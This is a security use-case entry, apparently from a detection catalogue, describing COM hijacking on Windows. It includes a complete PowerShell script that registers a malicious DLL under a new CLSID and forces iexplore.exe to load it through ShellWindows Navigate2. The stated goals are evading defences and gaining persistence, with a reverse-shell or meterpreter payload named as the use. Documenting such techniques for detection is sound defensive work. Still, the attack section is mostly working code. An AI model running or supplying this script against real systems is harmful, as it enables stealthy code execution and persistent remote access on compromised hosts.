UC0012: Forcing load a malicious DLL via COM Abuse
Summary
| ID | UC0012 |
|---|---|
| Brief Description | Forcing load a malicious DLL via COM Abuse |
| Author | Alex@Cyberok |
| Creation Date | 2023/02/28 |
| Modification Date | 2023/02/28 |
| ATT&CK Techniques | |
| Tags |
|
| Linked Response Playbooks | |
| Artifacts |
Description
It's possible to force iexplore.exe (or explorer.exe) to load a malicious DLL and execute it - a technique which could be used when attempting to evade certain defenses.
Attack mapping
| ARTIFACT | OBJECT | DESCRIPTION |
|---|---|---|
| Attack Prerequisites | ||
| Host | Compromised host | A host to which an attacker has an initial access |
| Operating system executable file | Explorer or IE | A file to inject, needed to lauch malware DLL file. Such launch is used for evasion |
| Side Observables | ||
| Executable Binary | Malicious DLL | Executable file with malware payload which an attacker wants to be executed on compromised host |
| Windows Registry | Registry | Contains low-level settings for the MS OS and application. In this case it's used for redirect DLL lauch |
| COM Object | COM object | Record in registry with random CLSID allows to handle incoming calls from COM clients |
Attack results
Whenever the injected executable file at compromised host is opened, malicious DLL will be launched and malicious code will be run.
| RESOURCE | DESCRIPTION |
|---|---|
| Attack Prerequisites | |
| Initial Access | Compromised host which attacker reached, but didnt't maintain yet |
| Result Consequences | |
| Persist Access | For example, attacker can load reverse shell into malware payload for achieving remote persist access |
| Evased Code Execution | Code execution via COM object allows to evade detection rules and some means of defense |
Attack progress
1) Below is a powershell code that creates a new COM object with a randomly chosen CLSID 55555555-5555-5555-5555-555555555555 which registers our malicious DLL at ..\attack\com_dll\reverse_64bit.dll to handle incoming calls from COM clients.
Powershell code
$CLSID = "55555555-5555-5555-5555-555555555555"
Remove-Item -Recurse -Force -Path "HKCU:\Software\Classes\CLSID\{$CLSID}" -ErrorAction SilentlyContinue
# path to the malicious DLL we want iexplore to load and execute
$payload = "C:\Users\aegorov\Desktop\attack\com_dll\reverse_64bit.dll"
New-Item -Path "HKCU:\Software\Classes\CLSID" -ErrorAction SilentlyContinue | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}" | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" | Out-Null
New-Item -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "(default)" -Value $Payload | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "ThreadingModel" -Value "Apartment" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\InProcServer32" -Name "LoadWithoutCOM" -Value "" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" -Name "HideOnDesktop" -Value "" | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{$CLSID}\ShellFolder" -Name "Attributes" -Value 0xf090013d -PropertyType DWORD | Out-Null
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin) | ? {$_.fullname -match 'iexplore'} | Select-Object -First 1
$shWin.Navigate2("shell:::{$CLSID}", 2048)
2) We can see that the new COM object got created successfully in the registry
requesting a new instance of the ShellWindows (9BA05972-F6A8-11CF-A442-00A0C90A8F39) COM object, which actually applies to both explorer.exe and iexplore.exe, meaning with a handle to that object, we can interface with them using their exposed methods.
Specifically, we are interested in getting an instance of a COM object for iexplore.exe, because its COM server has a method Navigate2(...) exposed. The Navigate2 allows us to programatically instruct the iexplore.exe to navigate to a URL.
We are asking iexplore to navigate to our newly created malicious CLSID pointing to our DLL instead of a URL.
Possible usage
1) Malware dll file may contains reverse_shell, so after IExplore.exe is launched we will get meterpeter session.
Attack diagram
Attack-flow diagram
